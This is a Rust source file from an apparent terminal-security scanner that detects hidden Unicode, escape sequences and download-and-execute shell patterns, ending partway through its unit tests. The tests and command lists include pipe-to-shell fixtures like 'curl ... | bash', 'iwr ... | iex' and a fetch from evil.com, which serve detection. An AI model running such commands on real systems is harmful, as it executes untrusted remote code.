// tirith_core/extract.rs
1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Context for Tier 1 scanning.
///
/// Selects which fast-path pattern set applies to the input — or, for
/// [`ScanContext::FileScan`], that no fast-exit applies at all.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// Exec-time: command about to be executed (check subcommand).
    Exec,
    /// Paste-time: content being pasted (paste subcommand).
    Paste,
    /// File scan: content read from a file (scan subcommand).
    /// Skips tier-1 fast-exit, runs byte scan + configfile rules only.
    FileScan,
}
18
// Include generated Tier 1 patterns from build.rs declarative pattern table.
// NOTE(review): `dead_code` is allowed here — presumably the generated file
// defines items not all referenced by this module; confirm against build.rs.
#[allow(dead_code)]
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
24
/// Expose the build-time extractor IDs for test-time cross-referencing.
///
/// The IDs come from the generated pattern table, so tests can verify that
/// every declared extractor has a corresponding pattern.
pub fn extractor_ids() -> &'static [&'static str] {
    tier1_generated::EXTRACTOR_IDS
}
29
/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
/// Compiled once on first use.
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});

/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
/// Compiled once on first use.
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
39
/// Standard URL extraction regex for Tier 3.
///
/// Matches either an explicit-scheme URL (`http`/`https`/`ftp`/`ssh`/`git`)
/// or an scp-style remote (`user@host:path`). Both alternatives stop at
/// whitespace, quotes, and angle brackets.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
47
/// Aggregate result of the paste-time byte scan (`scan_bytes`): one flag per
/// finding category plus per-offset details.
pub struct ByteScanResult {
    /// ESC introducing CSI/OSC/APC/DCS, or a trailing lone ESC byte.
    pub has_ansi_escapes: bool,
    /// C0 control bytes (except \n, \t, ESC, and benign \r / \r\n) or DEL.
    pub has_control_chars: bool,
    /// Unicode bidirectional control characters (LRM/RLM, embeddings, isolates).
    pub has_bidi_controls: bool,
    /// Zero-width characters (ZWSP/ZWNJ/ZWJ, CGJ, soft hyphen, word joiner,
    /// BOM anywhere except offset 0).
    pub has_zero_width: bool,
    /// Input is not valid UTF-8.
    pub has_invalid_utf8: bool,
    /// Unicode Tag characters U+E0000–U+E007F (hidden ASCII encoding).
    pub has_unicode_tags: bool,
    /// Variation selectors U+FE00–U+FE0F / U+E0100–U+E01EF.
    pub has_variation_selectors: bool,
    /// Invisible math operators U+2061–U+2064.
    pub has_invisible_math_operators: bool,
    /// Hair space, thin space, narrow no-break space.
    pub has_invisible_whitespace: bool,
    /// One entry per individual finding, in input order.
    pub details: Vec<ByteFinding>,
}
61
/// A single suspicious byte/character located by `scan_bytes`.
pub struct ByteFinding {
    /// Byte offset into the scanned input where the finding starts.
    pub offset: usize,
    /// First (or only) byte of the finding.
    pub byte: u8,
    /// Full Unicode codepoint for multi-byte characters (None for single-byte findings).
    pub codepoint: Option<u32>,
    /// Human-readable description of the finding.
    pub description: String,
}
69
70/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
71pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
72    match context {
73        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
74        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
75        // FileScan always proceeds to tier-3 (no fast-exit)
76        ScanContext::FileScan => true,
77    }
78}
79
80/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
81pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
82    let mut result = ByteScanResult {
83        has_ansi_escapes: false,
84        has_control_chars: false,
85        has_bidi_controls: false,
86        has_zero_width: false,
87        has_invalid_utf8: false,
88        has_unicode_tags: false,
89        has_variation_selectors: false,
90        has_invisible_math_operators: false,
91        has_invisible_whitespace: false,
92        details: Vec::new(),
93    };
94
95    // Check for invalid UTF-8
96    if std::str::from_utf8(input).is_err() {
97        result.has_invalid_utf8 = true;
98    }
99
100    let len = input.len();
101    let mut i = 0;
102    while i < len {
103        let b = input[i];
104
105        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
106        if b == 0x1b {
107            if i + 1 < len {
108                let next = input[i + 1];
109                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
110                    result.has_ansi_escapes = true;
111                    result.details.push(ByteFinding {
112                        offset: i,
113                        byte: b,
114                        codepoint: None,
115                        description: match next {
116                            b'[' => "CSI escape sequence",
117                            b']' => "OSC escape sequence",
118                            b'_' => "APC escape sequence",
119                            b'P' => "DCS escape sequence",
120                            _ => "escape sequence",
121                        }
122                        .to_string(),
123                    });
124                    i += 2;
125                    continue;
126                }
127            } else {
128                // Trailing lone ESC
129                result.has_ansi_escapes = true;
130                result.details.push(ByteFinding {
131                    offset: i,
132                    byte: b,
133                    codepoint: None,
134                    description: "trailing escape byte".to_string(),
135                });
136            }
137        }
138
139        // Control characters (< 0x20, excluding common whitespace and ESC)
140        // For \r: only flag when followed by non-\n (display-overwriting attack).
141        // Trailing \r and \r\n (Windows line endings) are benign clipboard artifacts.
142        if b == b'\r' {
143            let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
144            if is_attack_cr {
145                result.has_control_chars = true;
146                result.details.push(ByteFinding {
147                    offset: i,
148                    byte: b,
149                    codepoint: None,
150                    description: format!("control character 0x{b:02x}"),
151                });
152            }
153        } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
154            result.has_control_chars = true;
155            result.details.push(ByteFinding {
156                offset: i,
157                byte: b,
158                codepoint: None,
159                description: format!("control character 0x{b:02x}"),
160            });
161        }
162
163        // DEL character
164        if b == 0x7F {
165            result.has_control_chars = true;
166            result.details.push(ByteFinding {
167                offset: i,
168                byte: b,
169                codepoint: None,
170                description: "control character 0x7f (DEL)".to_string(),
171            });
172        }
173
174        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
175        if b >= 0xc0 {
176            // Try to decode UTF-8 character
177            let remaining = &input[i..];
178            if let Some(ch) = std::str::from_utf8(remaining)
179                .ok()
180                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
181                .and_then(|s| s.chars().next())
182            {
183                // Bidi controls
184                if is_bidi_control(ch) {
185                    result.has_bidi_controls = true;
186                    result.details.push(ByteFinding {
187                        offset: i,
188                        byte: b,
189                        codepoint: Some(ch as u32),
190                        description: format!("bidi control U+{:04X}", ch as u32),
191                    });
192                }
193                // Zero-width characters (ZWSP, ZWNJ, ZWJ, BOM, CGJ, Soft Hyphen, Word Joiner)
194                // BOM (U+FEFF) at offset 0 is a file-encoding artifact, not an attack
195                if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
196                    result.has_zero_width = true;
197                    result.details.push(ByteFinding {
198                        offset: i,
199                        byte: b,
200                        codepoint: Some(ch as u32),
201                        description: format!("zero-width character U+{:04X}", ch as u32),
202                    });
203                }
204                // Unicode Tags (hidden ASCII encoding) U+E0000–U+E007F
205                if is_unicode_tag(ch) {
206                    result.has_unicode_tags = true;
207                    result.details.push(ByteFinding {
208                        offset: i,
209                        byte: b,
210                        codepoint: Some(ch as u32),
211                        description: format!("unicode tag U+{:04X}", ch as u32),
212                    });
213                }
214                // Variation selectors: U+FE00–U+FE0F and U+E0100–U+E01EF
215                if is_variation_selector(ch) {
216                    result.has_variation_selectors = true;
217                    result.details.push(ByteFinding {
218                        offset: i,
219                        byte: b,
220                        codepoint: Some(ch as u32),
221                        description: format!("variation selector U+{:04X}", ch as u32),
222                    });
223                }
224                // Invisible math operators U+2061–U+2064
225                if is_invisible_math_operator(ch) {
226                    result.has_invisible_math_operators = true;
227                    result.details.push(ByteFinding {
228                        offset: i,
229                        byte: b,
230                        codepoint: Some(ch as u32),
231                        description: format!("invisible math operator U+{:04X}", ch as u32),
232                    });
233                }
234                // Invisible whitespace: Hair Space, Thin Space, Narrow No-Break Space
235                if is_invisible_whitespace(ch) {
236                    result.has_invisible_whitespace = true;
237                    result.details.push(ByteFinding {
238                        offset: i,
239                        byte: b,
240                        codepoint: Some(ch as u32),
241                        description: format!("invisible whitespace U+{:04X}", ch as u32),
242                    });
243                }
244                i += ch.len_utf8();
245                continue;
246            }
247        }
248
249        i += 1;
250    }
251
252    result
253}
254
/// Check if a character is a bidi control.
///
/// Covers the LRM/RLM marks, the legacy embedding/override block
/// (LRE, RLE, PDF, LRO, RLO), and the isolate block (LRI, RLI, FSI, PDI).
fn is_bidi_control(ch: char) -> bool {
    matches!(
        ch,
        '\u{200E}' | '\u{200F}' | '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}'
    )
}
272
/// Check if a character is zero-width.
fn is_zero_width(ch: char) -> bool {
    matches!(
        ch,
        '\u{00AD}' // Soft Hyphen
            | '\u{034F}' // Combining Grapheme Joiner
            | '\u{200B}'..='\u{200D}' // ZWSP, ZWNJ, ZWJ
            | '\u{2060}' // Word Joiner
            | '\u{FEFF}' // BOM / ZWNBSP
    )
}
286
/// Check if a character is a Unicode Tag (hidden ASCII encoding), U+E0000–U+E007F.
fn is_unicode_tag(ch: char) -> bool {
    matches!(ch, '\u{E0000}'..='\u{E007F}')
}
291
/// Check if a character is a variation selector:
/// VS1–16 (U+FE00–U+FE0F) or the supplementary VS17–256 (U+E0100–U+E01EF).
fn is_variation_selector(ch: char) -> bool {
    matches!(ch, '\u{FE00}'..='\u{FE0F}' | '\u{E0100}'..='\u{E01EF}')
}
299
/// Check if a character is an invisible math operator (U+2061–U+2064):
/// Function Application, Invisible Times, Invisible Separator, Invisible Plus.
fn is_invisible_math_operator(ch: char) -> bool {
    matches!(ch, '\u{2061}'..='\u{2064}')
}
305
/// Check if a character is an invisible whitespace variant:
/// Thin Space (U+2009), Hair Space (U+200A), Narrow No-Break Space (U+202F).
fn is_invisible_whitespace(ch: char) -> bool {
    matches!(ch, '\u{2009}' | '\u{200A}' | '\u{202F}')
}
315
/// Tier 3: Extract URL-like patterns from a command string.
/// Uses shell-aware tokenization, then extracts URLs from each segment.
///
/// Three passes run per segment:
/// 1. scheme'd URLs / scp-style remotes via `URL_REGEX` over command + args;
/// 2. schemeless `host/path` tokens — only in sink contexts, and not for
///    docker-family commands (their args are handled by pass 3);
/// 3. Docker image references for docker/podman/nerdctl subcommands.
pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
    let segments = tokenize::tokenize(input, shell);
    let mut results = Vec::new();

    for (seg_idx, segment) in segments.iter().enumerate() {
        // Extract standard URLs from command + args (not raw text, to skip env-prefix values).
        // Since URL_REGEX stops at whitespace, scanning individual words is equivalent to
        // scanning the non-env-prefix portion of the raw text.
        let mut url_sources: Vec<&str> = Vec::new();
        if let Some(ref cmd) = segment.command {
            url_sources.push(cmd.as_str());
        }
        for arg in &segment.args {
            url_sources.push(arg.as_str());
        }
        for source in &url_sources {
            for mat in URL_REGEX.find_iter(source) {
                let raw = mat.as_str().to_string();
                let url = parse::parse_url(&raw);
                results.push(ExtractedUrl {
                    raw,
                    parsed: url,
                    segment_index: seg_idx,
                    in_sink_context: is_sink_context(segment, &segments),
                });
            }
        }

        // Check for schemeless URLs in sink contexts
        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
        let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
            let cmd_lower = cmd.to_lowercase();
            matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
        });
        if is_sink_context(segment, &segments) && !is_docker_cmd {
            for (arg_idx, arg) in segment.args.iter().enumerate() {
                // Skip args that are output-file flag values
                if let Some(cmd) = &segment.command {
                    if is_output_flag_value(cmd, &segment.args, arg_idx) {
                        continue;
                    }
                }
                let clean = strip_quotes(arg);
                // Only report tokens the regex pass would NOT already catch.
                if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
                    results.push(ExtractedUrl {
                        raw: clean.clone(),
                        parsed: UrlLike::SchemelessHostPath {
                            host: extract_host_from_schemeless(&clean),
                            path: extract_path_from_schemeless(&clean),
                        },
                        segment_index: seg_idx,
                        in_sink_context: true,
                    });
                }
            }
        }

        // Check for Docker refs in docker commands
        if let Some(cmd) = &segment.command {
            let cmd_lower = cmd.to_lowercase();
            if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
                if let Some(docker_subcmd) = segment.args.first() {
                    let subcmd_lower = docker_subcmd.to_lowercase();
                    if subcmd_lower == "build" {
                        // For build, only -t/--tag values are image refs
                        let mut i = 1;
                        while i < segment.args.len() {
                            let arg = strip_quotes(&segment.args[i]);
                            // Separate flag + value form: -t NAME / --tag NAME
                            if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
                                let tag_val = strip_quotes(&segment.args[i + 1]);
                                if !tag_val.is_empty() {
                                    let docker_url = parse::parse_docker_ref(&tag_val);
                                    results.push(ExtractedUrl {
                                        raw: tag_val,
                                        parsed: docker_url,
                                        segment_index: seg_idx,
                                        in_sink_context: true,
                                    });
                                }
                                i += 2;
                            } else if arg.starts_with("-t") && arg.len() > 2 {
                                // Inline short form: -tNAME
                                let tag_val = strip_quotes(&arg[2..]);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else if let Some(val) = arg.strip_prefix("--tag=") {
                                // Long inline form: --tag=NAME
                                let tag_val = strip_quotes(val);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else {
                                i += 1;
                            }
                        }
                    } else if subcmd_lower == "image" {
                        // docker image pull/push/inspect — actual subcmd is args[1]
                        if let Some(image_subcmd) = segment.args.get(1) {
                            let image_subcmd_lower = image_subcmd.to_lowercase();
                            if matches!(
                                image_subcmd_lower.as_str(),
                                "pull" | "push" | "inspect" | "rm" | "tag"
                            ) {
                                extract_first_docker_image(
                                    &segment.args[2..],
                                    seg_idx,
                                    &mut results,
                                );
                            }
                        }
                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
                        // First non-flag arg is image, then stop
                        extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
                    }
                }
            }
        }
    }

    results
}
448
/// An extracted URL with context.
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    /// The matched text (quotes already stripped for schemeless/docker findings).
    pub raw: String,
    /// Structured parse of `raw`.
    pub parsed: UrlLike,
    /// Index of the shell segment the URL was found in.
    pub segment_index: usize,
    /// True when the containing segment executes/downloads its URL arguments.
    pub in_sink_context: bool,
}
457
/// Common value-taking flags across docker subcommands. The image-ref scan
/// must skip the argument that follows any of these.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform", "--format", "--filter", "-f", "--label", "-l", "--name",
    "--hostname", "--user", "-u", "--workdir", "-w", "--network", "--net",
    "--env", "-e", "--env-file", "--publish", "-p", "--expose", "--volume",
    "-v", "--mount", "--add-host", "--device", "--entrypoint", "--log-driver",
    "--log-opt", "--restart", "--runtime", "--cpus", "--cpu-shares",
    "--cpu-quota", "--memory", "--memory-reservation", "--memory-swap",
    "--shm-size", "--ulimit", "--security-opt", "--sysctl", "--tmpfs",
    "--gpus", "--ipc", "--pid", "--userns", "--cgroupns",
];

/// Short flags that may embed their value inline (e.g., -p8080:80).
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
510
511/// Extract the first non-flag argument as a Docker image reference.
512fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
513    let mut skip_next = false;
514    for arg in args {
515        if skip_next {
516            skip_next = false;
517            continue;
518        }
519        let clean = strip_quotes(arg);
520        if clean == "--" {
521            break;
522        }
523        if clean.starts_with("--") && clean.contains('=') {
524            continue; // --flag=value, skip
525        }
526        if clean.starts_with('-') {
527            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
528                skip_next = true;
529            }
530            if DOCKER_VALUE_PREFIXES
531                .iter()
532                .any(|p| clean.starts_with(p) && clean.len() > p.len())
533            {
534                continue;
535            }
536            continue;
537        }
538        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
539            let docker_url = parse::parse_docker_ref(&clean);
540            results.push(ExtractedUrl {
541                raw: clean,
542                parsed: docker_url,
543                segment_index: seg_idx,
544                in_sink_context: true,
545            });
546        }
547        break; // Only first non-flag arg is the image
548    }
549}
550
551/// Check if a segment is in a "sink" context (executing/downloading).
552fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
553    if let Some(cmd) = &segment.command {
554        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
555        let cmd_lower = cmd_base.to_lowercase();
556        // git is only a sink for download subcommands (clone, fetch, pull, etc.)
557        if cmd_lower == "git" {
558            return is_git_sink(segment);
559        }
560        if is_source_command(&cmd_lower) {
561            return true;
562        }
563    }
564
565    // Check if this segment pipes into a sink
566    if let Some(sep) = &segment.preceding_separator {
567        if sep == "|" || sep == "|&" {
568            // This segment receives piped input — check if it's an interpreter
569            if let Some(cmd) = &segment.command {
570                let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
571                if is_interpreter(cmd_base) {
572                    return true;
573                }
574            }
575        }
576    }
577
578    false
579}
580
/// Commands that fetch or install remote content; callers pass the
/// lowercased command basename.
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl", "wget", "http", "https", "xh", "fetch", "scp", "rsync",
        "docker", "podman", "nerdctl", "pip", "pip3", "npm", "npx", "yarn",
        "pnpm", "go", "cargo", "iwr", "irm", "invoke-webrequest",
        "invoke-restmethod",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
609
610/// Check if a git command is in a sink context (only subcommands that download).
611/// `git add`, `git commit`, `git status`, etc. are NOT sinks.
612fn is_git_sink(segment: &Segment) -> bool {
613    if segment.args.is_empty() {
614        return false;
615    }
616    // First non-flag arg is the subcommand
617    for arg in &segment.args {
618        let clean = strip_quotes(arg);
619        if clean.starts_with('-') {
620            continue;
621        }
622        return matches!(
623            clean.as_str(),
624            "clone" | "fetch" | "pull" | "submodule" | "remote"
625        );
626    }
627    false
628}
629
/// Commands that execute whatever is piped into them (shells and
/// script-language interpreters).
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh", "bash", "zsh", "dash", "ksh", "python", "python3", "node",
        "perl", "ruby", "php", "iex", "invoke-expression",
    ];
    INTERPRETERS.contains(&cmd)
}
647
648/// Check if an arg at the given index is the value of an output-file or credential flag
649/// for the given command. Returns true if this arg should be skipped during schemeless
650/// URL detection (output filenames and auth credentials can look like domains).
651fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
652    let cmd_lower = cmd.to_lowercase();
653    let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
654
655    match cmd_base {
656        "curl" => {
657            if arg_index > 0 {
658                let prev = strip_quotes(&args[arg_index - 1]);
659                if prev == "-o"
660                    || prev == "--output"
661                    || prev == "-u"
662                    || prev == "--user"
663                    || prev == "-U"
664                    || prev == "--proxy-user"
665                {
666                    return true;
667                }
668            }
669            let current = strip_quotes(&args[arg_index]);
670            if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
671                return true;
672            }
673            if current.starts_with("--output=")
674                || current.starts_with("--user=")
675                || current.starts_with("--proxy-user=")
676            {
677                return true;
678            }
679            false
680        }
681        "wget" => {
682            if arg_index > 0 {
683                let prev = strip_quotes(&args[arg_index - 1]);
684                if prev == "-O"
685                    || prev == "--output-document"
686                    || prev == "--user"
687                    || prev == "--password"
688                    || prev == "--http-user"
689                    || prev == "--http-password"
690                    || prev == "--ftp-user"
691                    || prev == "--ftp-password"
692                    || prev == "--proxy-user"
693                    || prev == "--proxy-password"
694                {
695                    return true;
696                }
697            }
698            let current = strip_quotes(&args[arg_index]);
699            if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
700                return true;
701            }
702            if current.starts_with("--output-document=")
703                || current.starts_with("--user=")
704                || current.starts_with("--password=")
705                || current.starts_with("--http-user=")
706                || current.starts_with("--http-password=")
707                || current.starts_with("--ftp-user=")
708                || current.starts_with("--ftp-password=")
709                || current.starts_with("--proxy-user=")
710                || current.starts_with("--proxy-password=")
711            {
712                return true;
713            }
714            false
715        }
716        "http" | "https" | "xh" => {
717            if arg_index > 0 {
718                let prev = strip_quotes(&args[arg_index - 1]);
719                if prev == "-a" || prev == "--auth" {
720                    return true;
721                }
722            }
723            let current = strip_quotes(&args[arg_index]);
724            if current.starts_with("--auth=") {
725                return true;
726            }
727            false
728        }
729        _ => false,
730    }
731}
732
/// Trim surrounding whitespace, then remove one matching pair of single or
/// double quotes if — and only if — the token starts and ends with the same
/// quote character.
fn strip_quotes(s: &str) -> String {
    let s = s.trim();
    for quote in ['"', '\''] {
        if let Some(inner) = s.strip_prefix(quote).and_then(|rest| rest.strip_suffix(quote)) {
            return inner.to_string();
        }
    }
    s.to_string()
}
743
/// Heuristic: does `s` look like a bare `host` or `host/path` token rather
/// than a flag, a filename, or an SSH/email target?
fn looks_like_schemeless_host(s: &str) -> bool {
    // Flags, dot-less tokens, and dotfiles/hidden files can never be hosts.
    if s.starts_with('-') || s.starts_with('.') || !s.contains('.') {
        return false;
    }
    // Reject bare user@host (SSH/SCP/email) but keep user:pass@host
    // (credentialed URL): bare user@host has no ':' before '@' and no '/'
    // after the host.
    if let Some(at_pos) = s.find('@') {
        let (before_at, after_at) = (&s[..at_pos], &s[at_pos + 1..]);
        if !before_at.contains(':') && !after_at.contains('/') {
            return false;
        }
    }
    // The component before the first '/' must look like a domain.
    let host_part = s.split('/').next().unwrap_or(s);
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }
    // A host whose "TLD" is a known file extension (e.g. install.sh) is a
    // filename — unless a non-empty path follows (evil.zip/payload), in which
    // case the token is likely a real domain even if its TLD overlaps a file
    // extension. A lone trailing slash (file.sh/) is NOT a meaningful path.
    let has_meaningful_path = s.find('/').is_some_and(|idx| {
        let after_slash = &s[idx + 1..];
        !after_slash.is_empty() && after_slash != "/"
    });
    if !has_meaningful_path {
        const FILE_EXTS: &[&str] = &[
            ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h",
            ".txt", ".md", ".json", ".yaml", ".yml", ".xml", ".html", ".css",
            ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip", ".gz", ".bz2",
            ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so",
            ".log", ".conf", ".cfg", ".ini", ".toml", ".png", ".jpg", ".jpeg",
            ".gif", ".bmp", ".ico", ".tiff", ".tif", ".pdf", ".csv", ".mp3",
            ".mp4", ".wav", ".avi", ".mkv", ".flac", ".ogg", ".webm", ".ttf",
            ".otf", ".woff", ".woff2", ".docx", ".xlsx", ".pptx", ".sqlite",
            ".lock", ".example", ".local", ".bak", ".tmp", ".swp", ".orig",
            ".patch", ".diff", ".map", ".env", ".sample", ".dist",
            ".editorconfig",
        ];
        let host_lower = host_part.to_lowercase();
        if FILE_EXTS.iter().any(|ext| host_lower.ends_with(ext)) {
            return false;
        }
    }
    // Need at least two dot-separated labels ("example.com", not "file"),
    // and the final label (TLD) must be 2–63 alphabetic chars (DNS limit).
    let mut labels = host_part.rsplit('.');
    let tld = labels.next().unwrap_or("");
    labels.next().is_some()
        && (2..=63).contains(&tld.len())
        && tld.chars().all(|c| c.is_ascii_alphabetic())
}
870
/// Returns the host portion of a schemeless URL-like string: everything
/// before the first `/`, or the whole string when no `/` is present.
fn extract_host_from_schemeless(s: &str) -> String {
    match s.find('/') {
        Some(slash_idx) => s[..slash_idx].to_string(),
        None => s.to_string(),
    }
}
874
/// Returns the path portion (including the leading `/`) of a schemeless
/// URL-like string, or an empty string when there is no path component.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map_or_else(String::new, |slash_idx| s[slash_idx..].to_string())
}
882
// Unit tests for this module: Tier 1 fast scanning (exec vs. paste
// contexts), raw byte scanning for control/escape characters, URL
// extraction from shell command lines, and the schemeless-host
// heuristics. All fixtures are inline; no I/O is performed.
#[cfg(test)]
mod tests {
    use super::*;

    // ─── Tier 1 scan: exec and paste contexts ───

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!tier1_scan("ls -la", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(tier1_scan("something | bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(tier1_scan("something | env bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(tier1_scan(
            "git clone git@github.com:user/repo",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(tier1_scan(
            "curl https://xn--example-cua.com",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(tier1_scan(
            "iwr https://evil.com/script.ps1",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(tier1_scan(
            "curl https://example.com/install.sh",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(tier1_scan("open file.zip", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
    }

    // Paste context includes all exec patterns plus paste-only ones
    // (e.g. non-ASCII content).

    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(tier1_scan("café", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        // Non-ASCII should NOT trigger exec-time scan
        assert!(!tier1_scan("echo café", ScanContext::Exec));
    }

    // ─── Byte scan: ANSI escapes, control chars, bidi, zero-width ───

    #[test]
    fn test_byte_scan_ansi() {
        let input = b"hello \x1b[31mred\x1b[0m world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        let input = b"hello\rworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_byte_scan_bidi() {
        // U+202E RIGHT-TO-LEFT OVERRIDE
        let input = "hello\u{202E}dlrow".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_bidi_controls);
    }

    #[test]
    fn test_byte_scan_zero_width() {
        // U+200B ZERO WIDTH SPACE
        let input = "hel\u{200B}lo".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let input = b"hello world\n";
        let result = scan_bytes(input);
        assert!(!result.has_ansi_escapes);
        assert!(!result.has_control_chars);
        assert!(!result.has_bidi_controls);
        assert!(!result.has_zero_width);
    }

    // ─── URL extraction from command lines ───

    #[test]
    fn test_extract_urls_basic() {
        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
        assert_eq!(urls.len(), 1);
        assert_eq!(urls[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_pipe() {
        let urls = extract_urls(
            "curl https://example.com/install.sh | bash",
            ShellType::Posix,
        );
        assert!(!urls.is_empty());
        assert!(urls[0].in_sink_context);
    }

    #[test]
    fn test_extract_urls_scp() {
        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
        assert!(!urls.is_empty());
        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
    }

    #[test]
    fn test_extract_docker_ref() {
        let urls = extract_urls("docker pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    #[test]
    fn test_extract_powershell_iwr() {
        let urls = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!urls.is_empty());
    }

    // Degenerate quote inputs: a lone quote character must pass through
    // unchanged rather than being stripped to an empty string.

    #[test]
    fn test_strip_quotes_single_char() {
        assert_eq!(strip_quotes("\""), "\"");
        assert_eq!(strip_quotes("'"), "'");
    }

    #[test]
